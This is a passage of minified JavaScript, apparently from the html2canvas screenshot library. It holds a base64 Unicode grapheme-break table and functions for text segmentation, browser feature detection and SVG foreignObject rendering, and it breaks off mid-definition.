AAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABQAFAAAAAAAAAAAABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAcABQAFAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAHAAUABQAFAAUABQAFAAUABwAHAAcABwAHAAcABwAHAAUABwAHAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABwAHAAcABwAFAAUABwAHAAcAAAAAAAAAAAAHAAcABQAHAAcABwAHAAcABwAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAcABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABQAHAAUABQAFAAUABQAFAAUAAAAFAAAABQAAAAAABQAFAAUABQAFAAUABQAFAAcABwAHAAcABwAHAAUABQAFAAUABQAFAAUABQAFAAUAAAAAAAUABQAFAAUABQAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABwAFAAcABwAHAAcABwAFAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAUABQAFAAUABwAHAAUABQAHAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAcABQAFAAcABwAHAAUABwAFAAUABQAHAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAcABwAHAAcABwAHAAUABQAFAAUABQAFAAUABQAHAAcABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAcABQAFAAUABQAFAAUABQAAAAAAAAAAAAUAAAAAAAAAAAAAAAAABQAAAAAABwAFAAUAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUAAAAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAABQAAAAAAAAAFAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAUABQAHAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAHAAcABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAHAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAcABwAFAAUABQAFAAcABwAFAAUABwAHAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAcABwAFAAUABwAHAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAFAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAFAAUABQAAAAAABQAFAAAAAAAAAAAAAAAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABQAFAAcABwAAAAAAAAAAAAAABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAFAAcABwAFAAcABwAAAAcABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAAAAAAAAAAAAAAAAAFAAUABQAAAAUABQAAAAAAAAAAAAAABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABQAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABwAFAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAcABQAFAAUABQAFAAUABQAFAAUABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAHAAcABQAHAAUABQAAAAAAAAAAAAAAAAAFAAAABwAHAAcABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABwAHAAcABwAAAAAABwAHAAAAAAAHAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAAAAAAFAAUABQAFAAUABQAFAAAAAAAAAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAFAAUABQAFAAUABwAHAAUABQAFAAcABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAHAAcABQAFAAUABQAFAAUABwAFAAcABwAFAAcABQAFAAcABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAHAAcABQAFAAUABQAAAAAABwAHAAcABwAFAAUABwAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAHAAUABQAFAAUABQAFAAUABQAHAAcABQAHAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABwAFAAcABwAFAAUABQAFAAUABQAHAAUAAAAAAAAAAAAAAAAAAAAAAAcABwAFAAUABQAFAAcABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAFAAUABQAFAAUABQAHAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAFAAAAAAAFAAUABwAHAAcABwAFAAAAAAAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABwAHAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABQAFAAUABQAFAAUABQAAAAUABQAFAAUABQAFAAcABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAAAHAAUABQAFAAUABQAFAAUABwAFAAUABwAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUAAAAAAAAABQAAAAUABQAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAHAAcAAAAFAAUAAAAHAAcABQAHAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAAAAAAAAAAAAAAAAAAABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAUABQAFAAAAAAAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAABQAFAAUABQAFAAUABQAAAAUABQAAAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAFAAUABQAFAAUADgAOAA4ADgAOAA4ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAAAAAAAAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAMAAwADAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAAAAAAAAAAAAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAAAAAAAAAAAAsADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwACwAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAADgAOAA4AAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAAAA4ADgAOAA4ADgAOAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAAAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAAAA4AAAAOAAAAAAAAAAAAAAAAAA4AAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAADgAAAAAAAAAAAA4AAAAOAAAAAAAAAAAADgAOAA4AAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAAAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAAAA4ADgAOAA4ADgAOAA4ADgAOAAAADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4AAAAAAAAAAAAAAAAAAAAAAA4ADgAOAA4ADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAOAA4ADgAOAA4ADgAAAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAAAAAAAAA="),P0=function(fe){return ba.get(fe)},Vr=function(fe,ce,ge){var _e=ge-2,je=ce[_e],tt=ce[ge-1],dt=ce[ge];if(2===tt&&3===dt)return"\xd7";if(2===tt||3===tt||4===tt||2===dt||3===dt||4===dt)return"\xf7";if(tt===Zd&&-1!==[Zd,md,nh,Xm].indexOf(dt)||(tt===nh||tt===md)&&(dt===md||10===dt)||(tt===Xm||10===tt)&&10===dt||13===dt||5===dt||7===dt||1===tt)return"\xd7";if(13===tt&&14===dt){for(;5===je;)je=ce[--_e];if(14===je)return"\xd7"}if(15===tt&&15===dt){for(var _t=0;15===je;)_t++,je=ce[--_e];if(_t%2==0)return"\xd7"}return"\xf7"},Jm=function(fe){var ce=function(fe){for(var ce=[],ge=0,_e=fe.length;ge<_e;){var je=fe.charCodeAt(ge++);if(je>=55296&&je<=56319&&ge<_e){var tt=fe.charCodeAt(ge++);56320==(64512&tt)?ce.push(((1023&je)<<10)+(1023&tt)+65536):(ce.push(je),ge--)}else ce.push(je)}return ce}(fe),ge=ce.length,_e=0,je=0,tt=ce.map(P0);return{next:function(){if(_e>=ge)return{done:!0,value:null};for(var dt="\xd7";_e<ge&&"\xd7"===(dt=Vr(0,tt,++_e)););if("\xd7"!==dt||_e===ge){var _t=fC.apply(null,ce.slice(je,_e));return je=_e,{value:_t,done:!1}}return{done:!0,value:null}}}},k_=function(fe){return 0===fe[0]&&255===fe[1]&&0===fe[2]&&255===fe[3]},O0=function(fe,ce,ge,_e,je){var tt="http://www.w3.org/2000/svg",dt=document.createElementNS(tt,"svg"),_t=document.createElementNS(tt,"foreignObject");return dt.setAttributeNS(null,"width",fe.toString()),dt.setAttributeNS(null,"height",ce.toString()),_t.setAttributeNS(null,"width","100%"),_t.setAttributeNS(null,"height","100%"),_t.setAttributeNS(null,"x",ge.toString()),_t.setAttributeNS(null,"y",_e.toString()),_t.setAttributeNS(null,"externalResourcesRequired","true"),dt.appendChild(_t),_t.appendChild(je),dt},_C=function(fe){return new Promise(function(ce,ge){var _e=new Image;_e.onload=function(){return ce(_e)},_e.onerror=ge,_e.src="data:image/svg+xml;charset=utf-8,"+encodeURIComponent((new XMLSerializer).serializeToString(fe))})},fs={get SUPPORT_RANGE_BOUNDS(){var fe=function(fe){if(fe.createRange){var ge=fe.createRange();if(ge.getBoundingClientRect){var _e=fe.createElement("boundtest");_e.style.height="123px",_e.style.display="block",fe.body.appendChild(_e),ge.selectNode(_e);var je=ge.getBoundingClientRect(),tt=Math.round(je.height);if(fe.body.removeChild(_e),123===tt)return!0}}return!1}(document);return Object.defineProperty(fs,"SUPPORT_RANGE_BOUNDS",{value:fe}),fe},get SUPPORT_WORD_BREAKING(){var fe=fs.SUPPORT_RANGE_BOUNDS&&function(fe){var ce=fe.createElement("boundtest");ce.style.width="50px",ce.style.display="block",ce.style.fontSize="12px",ce.style.letterSpacing="0px",ce.style.wordSpacing="0px",fe.body.appendChild(ce);var ge=fe.createRange();ce.innerHTML="function"==typeof"".repeat?"&#128104;".repeat(10):"";var _e=ce.firstChild,je=E(_e.data).map(function(gt){return g(gt)}),tt=0,dt={},_t=je.every(function(gt,kt){ge.setStart(_e,tt),ge.setEnd(_e,tt+gt.length);var Lt=ge.getBoundingClientRect();tt+=gt.length;var Ht=Lt.x>dt.x||Lt.y>dt.y;return dt=Lt,0===kt||Ht});return fe.body.removeChild(ce),_t}(document);return Object.defineProperty(fs,"SUPPORT_WORD_BREAKING",{value:fe}),fe},get SUPPORT_SVG_DRAWING(){var fe=function(fe){var ce=new Image,ge=fe.createElement("canvas"),_e=ge.getContext("2d");if(!_e)return!1;ce.src="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'></svg>";try{_e.drawImage(ce,0,0),ge.toDataURL()}catch(je){return!1}return!0}(document);return Object.defineProperty(fs,"SUPPORT_SVG_DRAWING",{value:fe}),fe},get SUPPORT_FOREIGNOBJECT_DRAWING(){var fe="function"==typeof Array.from&&"function"==typeof window.fetch?function(fe){var ce=fe.createElement("canvas"),ge=100;ce.width=ge,ce.height=ge;var _e=ce.getContext("2d");if(!_e)return Promise.reject(!1);_e.fillStyle="rgb(0, 255, 0)",_e.fillRect(0,0,ge,ge);var je=new Image,tt=ce.toDataURL();je.src=tt;var dt=O0(ge,ge,0,0,je);return _e.fillStyle="red",_e.fillRect(0,0,ge,ge),_C(dt).then(function(_t){_e.drawImage(_t,0,0);var gt=_e.getImageData(0,0,ge,ge).data;_e.fillStyle="red",_e.fillRect(0,0,ge,ge);var kt=fe.createElement("div");return kt.style.backgroundImage="url("+tt+")",kt.style.height="100px",k_(gt)?_C(O0(ge,ge,0,0,kt)):Promise.reject(!1)}).then(function(_t){return _e.drawImage(_t,0,0),k_(_e.getImageData(0,0,ge,ge).data)}).catch(function(){return!1})}(document):Promise.resolve(!1);return Object.defineProperty(fs,"SUPPORT_FOREIGNOBJECT_DRAWING",{value:fe}),fe},get SUPPORT_CORS_IMAGES(){var fe=void 0!==(new Image).crossOrigin;return Object.defineProperty(fs,"SUPPORT_CORS_IMAGES",{value:fe}),fe},get SUPPORT_RESPONSE_TYPE(){var fe="string"==typeof(new XMLHttpRequest).responseType;return Object.defineProperty(fs,"SUPPORT_RESPONSE_TYPE",{value:fe}),fe},get SUPPORT_CORS_XHR(){var fe="withCredentials"in new XMLHttpRequest;return Object.defineProperty(fs,"SUPPORT_CORS_XHR",{value:fe}),fe},get SUPPORT_NATIVE_TEXT_SEGMENTATION(){var fe=!("undefined"==typeof Intl||!Intl.Segmenter);return Object.defineProperty(fs,"SUPPORT_NATIVE_TEXT_SEGMENTATION",{value:fe}),fe}},Vf=function fe(ce,ge){this.text=ce,this.bounds=ge},FM=function(fe,ce){var ge=ce.ownerDocument;if(ge){var _e=ge.createElement("html2canvaswrapper");_e.appendChild(ce.cloneNode(!0));var je=ce.parentNode;if(je){je.replaceChild(_e,ce);var tt=Q(fe,_e);return _e.firstChild&&je.replaceChild(_e.firstChild,_e),tt}}return I.EMPTY},gC=function(fe,ce,ge){var _e=fe.ownerDocument;if(!_e)throw new Error("Node has no owner document");var je=_e.createRange();return je.setStart(fe,ce),je.setEnd(fe,ce+ge),je},im=function(fe){if(fs.SUPPORT_NATIVE_TEXT_SEGMENTATION){var ce=new Intl.Segmenter(void 0,{granularity:"grapheme"});return Array.from(ce.segment(fe)).map(function(ge){return ge.segment})}return function(fe){for(var _e,ce=Jm(fe),ge=[];!(_e=ce.next()).done;)_e.value&&ge.push(_e.value.slice());return ge}(fe)},CC=function(fe,ce){return 0!==ce.letterSpacing?im(fe):function(fe,ce){if(fs.SUPPORT_NATIVE_TEXT_SEGMENTATION){var ge=new Intl.Segmenter(void 0,{granularity:"word"});return Array.from(ge.segment(fe)).map(function(_e){return _e.segment})}return P_(fe,ce)}(fe,ce)},Er=[32,160,4961,65792,65793,4153,4241],P_=function(fe,ce){for(var je,ge=function(fe,ce){var ge=E(fe),_e=co(ge,ce),je=_e[0],tt=_e[1],dt=_e[2],_t=ge.length,gt=0,kt=0;return{next:function(){if(kt>=_t)return{done:!0,value:null};for(var Lt=Pt;kt<_t&&(Lt=Va(ge,tt,je,++kt,dt))===Pt;);if(Lt!==Pt||kt===_t){var Ht=new io(ge,Lt,gt,kt);return gt=kt,{value:Ht,done:!1}}return{done:!0,value:null}}}}(fe,{lineBreak:ce.lineBreak,wordBreak:"break-word"===ce.overflowWrap?"break-word":ce.wordBreak}),_e=[],tt=function(){if(je.value){var dt=je.value.slice(),_t=E(dt),gt="";_t.forEach(function(kt){-1===Er.indexOf(kt)?gt+=g(kt):(gt.length&&_e.push(gt),_e.push(g(kt)),gt="")}),gt.length&&_e.push(gt)}};!(je=ge.next()).done;)tt();return _e},oh=function fe(ce,ge,_e){this.text=BM(ge.data,_e.textTransform),this.textBounds=function(fe,ce,ge,_e){var je=CC(ce,ge),tt=[],dt=0;return je.forEach(function(_t){if(ge.textDecorationLine.length||_t.trim().length>0)if(fs.SUPPORT_RANGE_BOUNDS){var gt=gC(_e,dt,_t.length).getClientRects();if(gt.length>1){var kt=im(_t),Lt=0;kt.forEach(function(ui){tt.push(new Vf(ui,I.fromDOMRectList(fe,gC(_e,Lt+dt,ui.length).getClientRects()))),Lt+=ui.length})}else tt.push(new Vf(_t,I.fromDOMRectList(fe,gt)))}else{var Ht=_e.splitText(_t.length);tt.push(new Vf(_t,FM(fe,_e))),_e=Ht}else fs.SUPPORT_RANGE_BOUNDS||(_e=_e.splitText(_t.length));dt+=_t.length}),tt}(ce,this.text,_e,ge)},BM=function(fe,ce){switch(ce){case 1:return fe.toLowerCase();case 3:return fe.replace(yC,ac);case 2:return fe.toUpperCase();default:return fe}},yC=/(^|\s|:|-|\(|\))([a-z])/g,ac=function(fe,ce,ge){return fe.length>0?ce+ge.toUpperCase():fe},zc=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.src=_e.currentSrc||_e.src,je.intrinsicWidth=_e.naturalWidth,je.intrinsicHeight=_e.naturalHeight,je.context.cache.addImage(je.src),je}return de(ce,fe),ce}(pl),O_=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return 